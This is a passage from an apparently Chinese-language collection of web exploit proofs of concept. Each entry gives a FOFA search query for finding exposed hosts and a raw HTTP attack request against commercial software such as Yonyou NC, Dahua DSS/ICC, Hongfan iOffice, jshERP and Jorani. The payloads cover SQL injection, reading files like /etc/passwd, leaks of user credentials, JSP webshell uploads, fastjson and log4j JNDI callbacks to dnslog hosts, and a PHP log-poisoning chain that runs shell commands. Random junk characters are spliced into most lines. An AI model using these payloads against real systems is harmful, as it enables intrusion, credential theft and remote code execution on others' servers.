" m" b. i `; p0 T" N! AFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"' A+ u, _/ `6 h9 q3 p6 o
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
/ @( v4 C! B2 b4 q2 a5 YHost: 127.0.0.1/ @' |/ S% {2 r+ V% e) z( u' l
Pragma: no-cache6 o$ N) R3 C! |+ p
Cache-Control: no-cache: Z9 _0 v) M# b2 i ~
Upgrade-Insecure-Requests: 10 Z; `4 Z9 a& U. u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, O& j; C! B- p! S9 c5 L: ~3 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ v5 Q$ [/ `+ e/ T. a+ f, Q. B& k
Accept-Encoding: gzip, deflate
6 {1 ^+ q& }1 AAccept-Language: zh-CN,zh;q=0.9,en;q=0.8' G% U' ^8 E+ _2 A/ X' K
Connection: close
: V: Y6 ]) [+ {4 z: y
2 _& U" S2 d N @3 B& T, @) a5 X% s' \. {, J% F. O5 p
12. Jorani < 1.0.2 远程命令执行
5 }& m! ?0 M$ X1 ~1 Q6 e. U1 vFOFA:title="Jorani"
1 V* M# Q5 {6 T" D# k% _+ v第一步先拿到cookie
0 ~% }, B9 j; M7 U- ?* }GET /session/login HTTP/1.1
. u) W1 P/ |# m' XHost: 192.168.190.30
; t, C8 s2 d, u& FUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36- ?9 A+ f9 Y0 @8 M& {# C
Connection: close
9 V* h# m% ]& U+ K$ _Accept-Encoding: gzip. d( z+ U L5 b$ I; i- n
! F7 s- G/ I; t' x6 v+ a1 B! }& B$ P( ^- u+ i M* a9 d$ k
响应中csrf_cookie_jorani用于后续请求
, S, Y' W/ m8 O/ [% j$ f; Q' OHTTP/1.1 200 OK
8 z/ ^) C+ @ n7 t! ~/ u4 ?Connection: close
. E# y: d5 e. q% m* c& `) I+ |Cache-Control: no-store, no-cache, must-revalidate
6 W9 ?3 W5 b1 z9 a; HContent-Type: text/html; charset=UTF-82 s9 P+ {; q; c9 S0 y1 @
Date: Tue, 24 Oct 2023 09:34:28 GMT8 k3 D7 M& G. Y/ {2 V. O
Expires: Thu, 19 Nov 1981 08:52:00 GMT7 S) @4 I) @* d7 n
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT1 G! G5 o- u- a8 }. S
Pragma: no-cache) C- _. x% i- N% P6 _& y
Server: Apache/2.4.54 (Debian)
6 `! K/ v4 h& rSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/. j4 a) t' X6 g$ \( D. [
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
3 ^1 {' B& g) ?! s1 v) p% wVary: Accept-Encoding( l+ _& N' F) L5 h
- P* O% J! i5 }. m+ k% ?
" w, l7 c4 F- W9 w6 n
POST请求,执行函数并进行base64编码* X. `+ `2 R$ O* N. C
POST /session/login HTTP/1.1, A, \ c! L5 |/ m/ \8 l
Host: 192.168.190.30& w4 n- E/ F' s% R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.363 C9 J! S/ _" F5 ], k/ D M( w
Connection: close
2 e- P: o, N# T6 u& y7 |Content-Length: 2524 R/ M1 x" `$ j! H# S7 h7 `" W" k( \
Content-Type: application/x-www-form-urlencoded
$ j5 P- C' d2 WCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
5 N: _. u! R7 q7 uAccept-Encoding: gzip
9 o7 H D. z% g K+ W7 ~1 y8 }! u; d9 Q( f; }; O
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor6 T# G! e/ ?& }. z1 a$ N
) z; x$ }3 U6 i: p- Y
, {, B+ g5 m) c. R- C6 W
2 J& l/ N( N9 x3 S9 E: P% O( v向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串- O; [9 e7 q9 [% l0 I
GET /pages/view/log-2023-10-24 HTTP/1.1
4 C1 I( Z6 b1 VHost: 192.168.190.30. Z- @! t% l4 h0 Z; e5 x1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( W" j0 u( J4 q4 j2 M- w9 y/ yConnection: close
7 m. Q& {6 g9 K% |1 Q4 UCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r9 w; A7 Y, s) U7 ]- s
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
" j5 ~) x# o" P# vX-REQUESTED-WITH: XMLHttpRequest8 f: M0 u4 d. g+ Z2 j* ^
Accept-Encoding: gzip6 u: s3 ?+ g0 _6 }2 S/ s" O
' c6 ]5 A& s; H$ `/ ?6 Z! W! O5 d1 K* ~
13. 红帆iOffice ioFileDown任意文件读取
3 V4 P' F9 P8 n4 V4 fFOFA:app="红帆-ioffice"2 t, m, _9 [6 R' H4 O
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
d" n) ]% v G# P5 H) ?" zHost: x.x.x.x
; E" ]/ W9 O* h; j' o' QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# G( }" ?1 X) I, y8 HConnection: close
: R! ^+ a; ?0 v3 H- r& |* ?; iAccept: */*+ X M8 {) V. y* ]& P* p. P
Accept-Encoding: gzip- |: R2 H6 e9 ~* {/ i5 e2 {
: c: J& q& ?( [, n1 q, a( ^
. _# P7 M. @8 a" ]7 e14. 华夏ERP(jshERP)敏感信息泄露' p* ^: X+ a2 x, Z- C2 Y9 M
FOFA:body="jshERP-boot"6 H% Y* P0 ]( A; q! G
泄露内容包括用户名密码
# T( A$ Z* b) X5 S4 oGET /jshERP-boot/user/getAllList;.ico HTTP/1.1" W' }, D9 v0 J' L
Host: x.x.x.x( G8 [0 [0 C( f% S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 Z0 r) r8 K' o7 A* f0 J; |; U
Connection: close8 S$ A/ h" O; p% x/ W$ B
Accept: */*
- [5 B+ w, c4 o' y8 \" `; MAccept-Language: en
3 ]$ Z8 O! A: D' O7 f- K0 L. [Accept-Encoding: gzip, }1 G/ [ a( y' {7 h7 b2 \
3 E0 w- @" O% ~ Y( ~, V' }8 x# @
15. 华夏ERP getAllList信息泄露
6 Z3 Q$ K5 h* wCVE-2024-0490
/ ~/ w( v- K( q. T* xFOFA:body="jshERP-boot". _: U2 U ^2 Y$ o# Z9 K
泄露内容包括用户名密码
% t/ L! Y6 N% a' hGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
7 a6 w; u( P! ~1 Y0 Z2 _3 r) iHost: 192.168.40.130:100
; e' D/ b8 \/ H: P/ t/ NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
@* V6 i8 X( d* W6 mConnection: close. y1 A2 z. g! h" g! G' m, P
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
' Y$ N6 P9 l. Y& Z3 W- \Accept-Language: en' {- q7 b5 y) t/ N, w
sec-ch-ua-platform: Windows
3 M* ^4 P' c. Q! RAccept-Encoding: gzip% `: I! P) s2 O: X9 k5 r/ \
\9 I* Y% D, \, x1 c
% R) l; w8 T' D. a) S* t16. 红帆HFOffice医微云SQL注入
# J2 m4 k4 ^, m+ {FOFA:title="HFOffice"
1 N/ t7 h" H% ?poc中调用函数计算1234的md5值4 b- i4 f& I% k' x
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
! u. z- S7 x3 j9 [0 r3 B! P& uHost: x.x.x.x
1 W c! m8 j+ r5 `8 t2 |User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36. w1 i9 n% [$ W$ C& C
Connection: close
$ i6 W5 ]& ]6 [9 yAccept: */*! t0 ]% k/ F( P" _9 c* B% A( p2 p6 L
Accept-Language: en
& V) ~! b- h$ t- U/ u$ g* _0 x# I: DAccept-Encoding: gzip0 F4 V7 Z+ t3 d; \7 Q9 H% \) e, ]
' m9 c; n9 h! p+ x0 U8 A8 {
6 c3 I: @4 e1 D3 C! |* F0 i17. 大华 DSS itcBulletin SQL 注入* E9 `5 v0 [& U: ?; K
FOFA:app="dahua-DSS"
6 d# p! W1 j1 A7 L! Q+ O2 jPOST /portal/services/itcBulletin?wsdl HTTP/1.1
; ]1 v2 C- V# q4 B' iHost: x.x.x.x: y: ]2 [- ^5 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 d6 _+ S! t# b9 oConnection: close4 O. i O8 _) X
Content-Length: 345) D' W& J6 G' h0 H' s& \3 q( V9 G0 V* d
Accept-Encoding: gzip
4 ~7 Z% o- N4 k( ]8 z
2 R! l: ~7 E/ c2 C, l<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>9 a7 c/ B+ c& F" t- `( y
<s11:Body>0 b5 t( U, i+ C4 m
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; ?$ ]9 b$ G1 M <netMarkings>
! U2 Y0 m8 x o4 w (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1$ x2 h7 W+ q: W( }& i) M
</netMarkings>
$ c7 M: ^8 ^& _% S2 L z </ns1:deleteBulletin>
5 Q* h# I, |! }7 e </s11:Body>. H, E; H( j! p6 G g1 p1 Y4 W3 l! q
</s11:Envelope>+ g4 J. u) a7 A
! P0 `3 Z! H/ H
2 ?6 W' @2 ~ }; D* Y18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
, d, Q6 ^) ~! Q3 I! |FOFA:app="dahua-DSS"
3 @$ ^( ~9 ^! F2 _$ b. IGET /admin/cascade_/user_edit.action?id=1 HTTP/1.18 V1 K' E/ F$ m) {
Host: your-ip ^* i; c2 F, ^" F( h; ?/ e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
7 n" t- V& A, l; iAccept-Encoding: gzip, deflate+ N% L: i9 b% z1 A4 ?4 u
Accept: */*
; o7 U1 T6 K% G: E6 TConnection: keep-alive
$ x- G: V8 t+ w4 p# F. q7 s7 M! j1 A7 l6 E! T' v
3 q) \' p" B1 @: V' \5 A( `# B2 w
A3 ~+ v5 M1 T# m19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入. o9 V0 r4 ^7 n3 S9 M
FOFA:app="dahua-DSS"3 g4 o* n5 g' ~- F
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1 I" @' o' b, W8 O! e s
Host:+ G! ?, o( R, q! V+ I
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
% |. |$ y9 I: ~: U( Q! t) hAccept-Encoding: gzip, deflate5 h' U! \. N. v% n' x. Q
Accept: */*
& @5 J+ ~' e* g, p7 A$ [5 oConnection: keep-alive
l7 P; z- w+ e. }: |7 n# d: c% S! S3 K" d0 ?
$ }6 i4 A8 u/ h20. 大华ICC智能物联综合管理平台任意文件读取
9 B$ D! n7 L+ i' GFOFA:body="*客户端会小于800*"3 ?- x f: x, D% V9 P
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* _2 p. E7 a( [, z8 [% o- h5 `
Host: x.x.x.x2 o* t8 F! W1 s
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" \% K4 P- V/ J8 ZConnection: close
0 z$ T& c. N5 [: Z% s$ v) g# UAccept: */* k" w% S! z& i1 p) U* |
Accept-Language: en/ X0 G2 }# q3 g# K# z. p q
Accept-Encoding: gzip
5 f h- e' y' q. k- g F. z/ |8 G6 E1 J. b" [+ f- d
3 F9 E) E8 c5 S8 Y( u
21. 大华ICC智能物联综合管理平台random远程代码执行
+ k/ ?2 u' p: s2 MFOFA:icon_hash="-1935899595"
, c9 O( z7 o U3 z. k0 ?2 DPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
* m! q1 {+ I8 THost: x.x.x.x x' v0 }2 a7 a7 ?' F# Q1 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ L r, o( K8 y' m9 D+ tContent-Length: 1618 {3 b3 b# ?/ s
Accept-Encoding: gzip: e: f; Z5 L& P! e4 q% u: A, ]# y
Connection: close) F: t2 E7 C" k8 T
Content-Type: application/json;charset=utf-8
+ E& N8 N' t1 {" L! I5 s8 Z
1 s; Y p- O* Z6 C" W0 x! C/ n: ^{
0 o5 E1 I2 v- n. j( ?" L: F4 N"a":{/ t5 Z& m. R5 C+ H! Q
"@type":"com.alibaba.fastjson.JSONObject",
. S% N& G- f- D/ T {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}/ `) p5 H5 W/ Y( X( ~, v
}""; Y# d$ ]( T( |2 i7 g) c& {
}
% C3 K# P% F+ z$ Y
* g ~# Y! W, B, T, p; V X: q( w2 R7 r
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
1 o0 p0 E' G) i3 ?. G0 ^/ ^! a5 PFOFA:icon_hash="-1935899595", d9 z" e n6 V# P/ b9 b7 i
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
. U8 `3 s9 X+ ?0 {9 Q6 H% WHost: your-ip
7 w0 z: w! u$ p, XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
1 v8 M3 W0 _; c2 a- p' cContent-Type: application/json;charset=utf-8
* G# m T- H' [1 b5 x& M) {3 O# r2 e6 Z4 b9 t$ y7 z
{' K6 w+ V J" `* }- q
"loginName":"${jndi:ldap://dnslog}"
% ]* w) u0 V- ]- \. z& ]}! v! ]1 e, ~) {5 X4 G1 \% `2 G
% ?3 z# C# x4 e3 E4 H% [$ m% S2 ]/ Y: D. f3 L. t _
8 w2 X5 I7 f5 ~ F3 W. P+ @' q; }23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
3 {, s0 Y D6 i3 j* LFOFA:icon_hash="-1935899595"
- e1 j& ?6 i7 \. r3 B4 k+ P: ]6 H, oPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1+ H: y1 _+ h% K3 n9 ^ @
Host: your-ip) H! k2 z7 f1 X0 R3 R8 h" c' Z6 @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: f7 n2 y1 D( GContent-Type: application/json;charset=utf-8+ Z: c8 \/ M4 O! y7 H
Accept-Encoding: gzip
; J% j$ X# F/ [+ m1 ?) NConnection: close- J" { g5 f& m1 w9 G
5 s! ~* D& x% s: N0 |9 R: o{( @7 a8 w1 L( p1 ]+ A: k
"a":{
( S0 ^$ X9 X' g' A: R* \ "@type":"com.alibaba.fastjson.JSONObject",
/ ?: j& q% B* f3 _7 Y2 v {"@type":"java.net.URL","val":"http://DNSLOG"}
+ d6 c+ ]6 ], c) C: Q" [ }""+ n0 t6 U i+ w: [) o6 L( D
}
% r9 v c* H+ i6 k( s3 X. Z
! M% {& q5 J# G& `6 r8 q2 o1 M5 k( L5 r2 X* `$ a% O
24. 用友NC 6.5 accept.jsp任意文件上传; P( E6 G+ p$ j
FOFA:icon_hash="1085941792"! ?) L6 [" d" U/ H0 u3 P2 I
POST /aim/equipmap/accept.jsp HTTP/1.1
2 a# F& D7 W8 _( [/ Z1 v0 ]( F. H% |Host: x.x.x.x( _) L" V O1 w
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
( S' D9 {0 R* Y7 `- ?% {6 i6 sConnection: close) T% c3 T7 g" @
Content-Length: 4497 K6 @3 X2 h+ v; b) G& M
Accept: */*
3 V I- m o+ G* N- AAccept-Encoding: gzip5 k( Y* c. e' X: e+ y1 V: `2 O
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
% G6 J% U1 w: W1 d7 S
' x* e8 U. |7 d$ b5 f7 U4 s-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
1 i# ~ [4 H6 W6 |1 W& nContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt", J3 L z& T( `3 J: U
Content-Type: text/plain( j) Q7 {! y* V- q- y8 k
. e6 m/ l* b; K9 ~. N% H<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
/ w3 t; z2 T9 K+ H. W) W* W-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
# U% q1 @+ Y( ^6 HContent-Disposition: form-data; name="fname"6 }( Q! c# N9 z9 j
9 h4 \( f/ k. U" }4 D. Q\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
6 l% D/ p8 v1 F# b( f; T# t; d-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--# [! R7 k1 f. o; [# w
! U1 ~2 |2 L. c2 L V
& J+ d7 `7 O; X/ X4 ?/ X25. 用友NC registerServlet JNDI 远程代码执行
5 G9 p/ U$ d( F0 C# |# [FOFA:app="用友-UFIDA-NC"
0 A$ f5 w) ?# Q2 xPOST /portal/registerServlet HTTP/1.1: H5 o/ o5 i: ^$ u2 N
Host: your-ip, n; l: c/ I' y" R2 B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0+ D* |4 S3 G. d4 K/ d- ] f' [/ x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
4 h/ t( B9 \; n0 G* C! I% BAccept-Encoding: gzip, deflate
1 T1 _* ~ H+ D2 X$ UAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6% ?6 O$ V& B# J% y' n
Content-Type: application/x-www-form-urlencoded+ N& F1 G# D1 \0 a D' \
2 w; y; S; M4 Etype=1&dsname=ldap://dnslog- b3 B/ t+ o5 m9 F
% j% D, A9 ?3 ]5 x1 y/ `5 b# m- @: U- Z6 W/ x
% t( d) t* v" z. w% h
26. 用友NC linkVoucher SQL注入) z2 @' b( c. s- c7 H) j
FOFA:app="用友-UFIDA-NC", P( m: W3 g C3 K8 i
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 n! t; ]$ [6 m; K hHost: your-ip
0 Y, I* d# g' TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 B% K3 i1 i2 ^7 x9 _- d( v KContent-Type: application/x-www-form-urlencoded7 V) k, w4 t4 F( ~4 G8 @2 Y
Accept-Encoding: gzip, deflate5 W2 h+ u) |$ O8 M+ O6 {
Accept: */*: K. P& U' ~' a4 q/ T* t' ]# x* a
Connection: keep-alive
4 i* e, E: H9 n1 |* C: ~: l# E8 c8 V& r; |4 I
5 }7 I+ H, X* H4 d9 U
27. 用友 NC showcontent SQL注入
* T+ n! Z/ ]4 C+ J* U8 F7 W7 lFOFA:icon_hash="1085941792"1 ?1 M4 i2 i! g5 l
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.12 ?: e, ^/ a O& J _0 [: A
Host: your-ip4 Q9 S7 V y) j9 v9 |5 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ |: q M- H4 J1 k, M0 O( B. `Accept-Encoding: identity2 A6 F8 J4 \6 A# \' `
Connection: close
' B, d: S+ Q2 _* u0 LContent-Type: text/xml; charset=utf-8
! L! G# U5 w- q! S3 u; p. S" q$ ^8 ?. n, |& G2 r6 V" p
( n) _% [. k8 k4 t4 h
28. 用友NC grouptemplet 任意文件上传
7 s/ Q- p9 L' @! WFOFA:icon_hash="1085941792"0 C, U( c o# a; C
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
1 [/ ~, W( h1 z" O( g3 ^. jHost: x.x.x.x
_& w- ]2 V2 z7 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36( F' ?. u0 C7 ?: `+ S
Connection: close6 j8 E7 B C! U6 o4 `2 M: I9 S
Content-Length: 268( c) u, ^6 e' B
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
1 Q% h1 e* N1 P3 z: k! d% MAccept-Encoding: gzip. Y4 U; Y4 g8 H- k! r
2 R0 @8 X- X3 A" P- F
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk6 A& ]/ q1 \) L- h* }! J2 A
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"+ @0 Z' _( \& M4 n
Content-Type: application/octet-stream, S5 K0 F, a( O; Q/ a
$ A& y- }+ O: D$ L. B8 B6 Z, q<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
9 \% A/ v- T0 Z' W------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
* `8 @4 _' J% L: T* s
3 o8 X+ h0 X( B8 I, ~+ y0 Z t1 A0 c. I2 C0 @
/uapim/static/pages/nc/head.jsp
- [7 _: Z6 y/ `; G2 z
# S0 I {9 ]. }2 M r& N3 T) y4 r$ ^8 s29. 用友NC down/bill SQL注入* Q1 G9 y0 L; j
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
8 v- O6 h+ D# [0 uGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.17 G# }* Q, w: e
Host: your-ip8 r/ |3 s, T* a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 d& m! R, T0 q$ X5 i/ q; D
Content-Type: application/x-www-form-urlencoded
6 i* W% O. N, p+ m6 JAccept-Encoding: gzip, deflate9 P" J( A) o4 Y5 z
Accept: */*3 k; {9 d' o0 C: f; f' c Y
Connection: keep-alive
3 Q. W* d+ Q' c5 R/ \5 m `1 m6 t
7 L4 P8 p+ H; T5 \- O* X30. 用友NC importPml SQL注入/ ]) c l6 L5 ?5 z8 ~' O
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"4 R8 }& R, Q j1 l p
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1, x; a+ v0 ?& g& o0 f, [
Host: your-ip
( J" }8 [/ E* }5 D5 Q9 s% e0 oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V! G0 v E! T, C0 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 d( J4 R7 o. {6 Y9 ~
Connection: close0 P5 m8 Z, N4 f- H. T, c
) d4 o1 E" y) e. F- n. C2 T: ^
------WebKitFormBoundaryH970hbttBhoCyj9V
/ _3 X& e1 x# s/ fContent-Disposition: form-data; name="Filedata"; filename="1.jpg". I, d ~* i, H6 Q
Content-Type: image/jpeg- i' m" k5 B+ J l
------WebKitFormBoundaryH970hbttBhoCyj9V--+ b1 s- y, q0 e" L; \ p7 E
* { P; n: S' _; N* Q# j9 B" o: ^, n/ u0 m2 ]& p6 j% z) D3 M
31. 用友NC runStateServlet SQL注入1 A. v$ e, m4 W3 C% q
version<=6.5
/ P, v" o J% E2 R' d* h- wFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 a' W0 I4 G& r. U. C
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.14 I/ {4 O. P. I% [
Host: host/ ^' A4 j8 M1 z0 I+ U6 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.366 W4 f' {6 G# @- {3 r& r
Content-Type: application/x-www-form-urlencoded
4 r* k# u: u; {9 V ^* n
& ~) w# R! J, f8 L
5 ?" q8 ]' x: s! f32. 用友NC complainbilldetail SQL注入+ n) w% s. }5 r5 _
version= NC633、NC65% F# a/ T9 `& Z7 r1 n
FOFA:app="用友-UFIDA-NC"
. X: d+ r7 V& @* g4 kGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- {/ u/ a* j4 z( o3 I, hHost: your-ip4 P7 f" ^6 M' @) t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# S# v' q! X ~8 N) a: L5 T. D0 N
Content-Type: application/x-www-form-urlencoded+ i0 `( q/ q+ a
Accept-Encoding: gzip, deflate& C; v% K2 N) ^& @6 C- r: y8 c
Accept: */*
: D$ {2 a+ _/ T& s- n; H4 v) kConnection: keep-alive- R$ Y3 u0 @3 r5 S' }. u; m
, J5 Q1 ~* e: \* E4 i
" J: v4 S, D8 L* p; u( r9 u1 Q) Y33. 用友NC downTax/download SQL注入5 C! R3 q$ `) Z/ f( v8 w- N3 o+ c
version:NC6.5FOFA:app="用友-UFIDA-NC"
% l5 Q( _' ?/ Z$ P/ N# T+ \GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.14 j$ u/ c4 O; k, B
Host: your-ip% l I6 r% T! X8 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! G9 I/ g( y; v& p+ ]
Content-Type: application/x-www-form-urlencoded( X1 D* x/ p7 U4 P6 }, v
Accept-Encoding: gzip, deflate$ b; [& ~ ~1 s
Accept: */*/ h8 r$ n/ O8 Y7 y4 S6 }
Connection: keep-alive( g+ v' b" }! q- F4 K, Y
% t! n9 w9 S* R$ D0 n
; P Q; @2 D. l# ]0 {/ d+ S
34. 用友NC warningDetailInfo接口SQL注入+ u5 f$ q" `6 s, X [9 l
FOFA:app="用友-UFIDA-NC"
" @' I x0 c4 s- G9 zGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
5 [' e* g9 `# E K. XHost: your-ip8 A6 ^7 i$ o: L+ O+ h- `$ O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 I2 I! H$ J8 h2 E8 q2 XContent-Type: application/x-www-form-urlencoded
0 Y8 W7 }4 {% Q; r# BAccept-Encoding: gzip, deflate
; ?8 N" O. }3 I3 H6 F5 ~, n9 j3 pAccept: */*5 f' v1 h q" }9 l1 Z) U
Connection: keep-alive" f( x9 Z2 i! S5 P, n6 v0 ?
% `' E- Q5 b* j" y7 e6 w+ a& x* V
9 K' ]& l, i' o4 [9 A4 H35. 用友NC-Cloud importhttpscer任意文件上传
